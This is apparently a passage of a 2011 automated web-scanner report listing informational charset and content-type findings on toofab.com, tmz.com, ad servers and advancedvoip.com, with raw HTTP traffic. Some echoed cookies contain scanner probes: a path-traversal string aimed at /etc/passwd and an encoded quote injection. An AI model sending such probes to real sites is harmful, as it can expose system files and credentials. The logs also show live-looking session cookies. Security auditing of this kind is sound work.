Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; s_wb_ftcv=Sep2011%3AADID%3Ahero2; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_campaign=hero1; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DJustin%252520Timberlake%25253A%252520%252520Not%252520My%252520Penis%252521%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/signin/_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:02:07 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:02:07 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2%2527; expires=Sun, 20-Feb-2028 01:02:07 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 49975
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text
...[SNIP]...
<meta property="fb:page_id" content="208421665712" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.10. http://www.toofab.com/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.toofab.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET / HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:50:30 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding
Content-Length: 47513
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<META name="y_key" content="14cb04e4656b0c58" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.11. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.toofab.com
Path:   /2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DCeleb%252520Couples%252520%25257C%252520tooFab%252521%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:08:42 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:08:42 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd; expires=Sun, 20-Feb-2028 01:08:42 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 41681
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<META name="y_key" content="14cb04e4656b0c58" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.12. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.toofab.com
Path:   /2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __qca=P0-1777464361-1316238721670; s_sq=wbrostoofab%3D%2526pid%253DTooFab%252520Homepage%252520%25255B%25255D%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:50:59 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:50:59 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 00:50:59 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 71853
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<META name="y_key" content="14cb04e4656b0c58" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.13. http://www.toofab.com/category/celeb-couples/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.toofab.com
Path:   /category/celeb-couples/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /category/celeb-couples/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DHollywood%252520News%25252C%252520Red%252520Carpet%252520Fashion%252520and%252520Celebrity%252520Hairstyles%252520%25257C%252520tooFab.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/category/celeb-couples/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:08:08 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 01:08:09 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 01:08:08 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 31377
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/
...[SNIP]...
<META name="y_key" content="14cb04e4656b0c58" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

27.14. http://www.toofab.com/news/  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.toofab.com
Path:   /news/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /news/ HTTP/1.1
Host: www.toofab.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1777464361-1316238721670; phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; s_cc=true; s_sq=wbrostoofab%3D%2526pid%253DTooFab%252520News%252520Page%252520%25255BExclusive%25253A%252520Melissa%252520Rivers%252520Splits%252520With%252520Boyfriend%25255D%2526pidt%253D1%2526oid%253Dhttp%25253A//www.toofab.com/news/%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:51:43 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:51:44 GMT
Set-Cookie: phpsessionid=iktc8fndah8vc0ik7ng8p5ghj4; expires=Sun, 20-Feb-2028 00:51:43 GMT; path=/; domain=www.toofab.com
Vary: Accept-Encoding
Content-Length: 37064
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="text/jav
...[SNIP]...
<META name="y_key" content="14cb04e4656b0c58" />

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="pragma" content="no-cache" />
...[SNIP]...

28. Content type incorrectly stated  previous  next
There are 109 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


28.1. http://a1.interclick.com/getInPageJS.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJS.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=53&b=13578&cid=1242931236281 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38185087&rk1=62469548&rk2=1316239584.729&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Sat, 17 Sep 2011 07:44:24 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 17 Sep 2011 01:44:23 GMT
Content-Length: 6347

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...

28.2. http://a1.interclick.com/getInPageJSProcess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.interclick.com
Path:   /getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJSProcess.aspx?a=53&b=13578&cid=1242931236281&isif=t&rurld=bostonherald.com&sl=true&dvp=http%3A//bostonherald.com/includes/processAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F/your_tax_dollars_at_work&rurl=http%3A%2F%2Fbostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DTop%26companion%3DTop%2CBottom%26page%3Dbh.heraldinteractive.com%252F%2Fyour_tax_dollars_at_work HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=84147797&rk1=23847443&rk2=1316239624.853&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 17 Sep 2011 01:05:41 GMT
Content-Length: 318

document.write(unescape("%3CSCRIPT%20language%3D%27JavaScript1.1%27%20SRC%3D%22http%3A//ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5761718.3%3Bsz%3D728x90%3Bclick0%3Dhttp%3A//a1.interclick.com/ica
...[SNIP]...

28.3. http://ad.doubleclick.net/pfadx/tmz_cim/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /pfadx/tmz_cim/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /pfadx/tmz_cim/;secure=false;canopy_allowed=false;position=1;pc2=1;ic10=1;pc4=1;ic18=1;ac17=1;ac16=1;ac14=1;ama_allowed=false;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;ac20=1;ac10=1;ic3=1;ic12=1;ac19=1;borderless_allowed=false;ic19=1;ic16=1;ac12=1;pc1=1;ic9=1;ic1=1;sz=24x24;dcmt=text/html;ord=1316238803603? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=tmz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 508
DCLK_imp: v7;x;214948934;0-0;0;48682791;24/24;31459665/31477541/1;;~aopt=2/0/5c/0;~okv=;secure=false;canopy_allowed=false;position=1;pc2=1;ic10=1;pc4=1;ic18=1;ac17=1;ac16=1;ac14=1;ama_allowed=false;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;ac20=1;ac10=1;ic3=1;ic12=1;ac19=1;borderless_allowed=false;ic19=1;ic16=1;ac12=1;pc1=1;ic9=1;ic1=1;sz=24x24;dcmt=text/html;~cs=a
Date: Sat, 17 Sep 2011 00:52:00 GMT

DoubleClick.onAdLoaded('MediaAlert', {"impressionUrl": "http://ad.doubleclick.net/imp;v7;x;214948934;0-0;0;48682791;24/24;31459665/31477541/1;;~aopt=2/0/5c/0;~okv=;secure=false;canopy_allowed=false;po
...[SNIP]...

28.4. https://admin.usenetbinaries.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://admin.usenetbinaries.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: admin.usenetbinaries.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UBReferer=S&aw&T&1316201486&P&&K&usenet&H&2tApedj%2BMqga5hQNxux7lA&C&&R&http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dnntp%2Bserver&U&http%3A%2F%2Fwww.usenetbinaries.com%2Fl%2Fnewsgroups.html

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:32:49 GMT
Server: Apache
Last-Modified: Sat, 05 Jan 2008 00:47:59 GMT
ETag: "93988b-47e-fa7d2dc0"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....................................@@@.....sss.................@@...... ......................www.........DDD.....................ww..""......................DD
...[SNIP]...

28.5. http://adserver.teracent.net/tase/ad  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserver.teracent.net
Path:   /tase/ad

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /tase/ad?AdBoxType=15&url=googleoffers.dfa.cities&inv=doubleclick&rnd=1316239631507&esc=0&CustomQuery=zipcode%3D75207%26dma%3D102%26eaid%3D245022995%26epid%3D69978503%26esid%3D791901%26ecid%3D43091605%26ebuy%3D5761718%26 HTTP/1.1
Host: adserver.teracent.net
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/3125202/PID_1715626_Parent_SkyBridge_Merchant_Dynamic_728x90_noStore.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1316221519903_63671954_as3102_vew|374#1316221519820_135153353_as3104_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: imp=a$le#1316221548433_135109402_as3106_imp|374#1316221548433_135109402_as3106_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Thu, 15-Mar-2012 01:05:48 GMT; Path=/tase
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:05:48 GMT
Content-Length: 2744

resourceServer=http%3A%2F%2Fpcdn.tcgmsrv.net%2Ftase&eventId=1316221548433_135109402_as3106_imp&responseStatus=0&eventUrl=http%3A%2F%2Fadserver.teracent.net%2Ftase%2Fredir%2F1316221548433_135109402_as3
...[SNIP]...

28.6. http://advancedvoip.com/images/VoIP_white_papers.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/VoIP_white_papers.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/VoIP_white_papers.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1808
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:25:02 GMT
Accept-Ranges: bytes
ETag: "aeb5f419e7b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:06 GMT
Connection: close

GIF87al...w..,....l...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.7. http://advancedvoip.com/images/VoIP_white_papers_up.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/VoIP_white_papers_up.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/VoIP_white_papers_up.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 2048
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:25:00 GMT
Accept-Ranges: bytes
ETag: "9471d19e7b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:07 GMT
Connection: close

GIF87al...w..,....l....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.9p.9q.9r.:p.:q.;q
...[SNIP]...

28.8. http://advancedvoip.com/images/voip_billing_company.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/voip_billing_company.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_company.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1654
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:25 GMT
Accept-Ranges: bytes
ETag: "0f98ee0e6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:06 GMT
Connection: close

GIF87aQ...w..,....Q...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.9. http://advancedvoip.com/images/voip_billing_company_contact.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/voip_billing_company_contact.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_company_contact.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1565
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:25 GMT
Accept-Ranges: bytes
ETag: "4c348ae0e6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:06 GMT
Connection: close

GIF87aD...w..,....D...................................<v.<w.=w.=x.>y.>z.?|.?}.@.@..C..C..G..G..D..D.!G.!G.%K.%K.*R.*R.)V.)V.,Y.,Y..X..X./]./].2^.2^.1b.1b.3f.3f.5k.5k.9p.9p.;u.;u.?{.?{.C..C..F..F..H..
...[SNIP]...

28.10. http://advancedvoip.com/images/voip_billing_company_contact_p.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://advancedvoip.com
Path:   /images/voip_billing_company_contact_p.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/voip_billing_company_contact_p.jpg HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://advancedvoip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1773
Content-Type: image/jpeg
Last-Modified: Fri, 26 Feb 2010 13:23:23 GMT
Accept-Ranges: bytes
ETag: "9c83d3dee6b6ca1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:07 GMT
Connection: close

GIF87aD...w..,....D....................................*..*..*..+..,    .,
.-
..
.-../..0..2..3..4..5..4..5.!5."7."8.#9.%;.%<.'@.&C.)B.+C.+D.,G..H..L.2N.2O.:Z.:[.8n.8o.9n.:o.:k.;m.<o.8p.8q.9p.9q.9r.:p.;q
...[SNIP]...

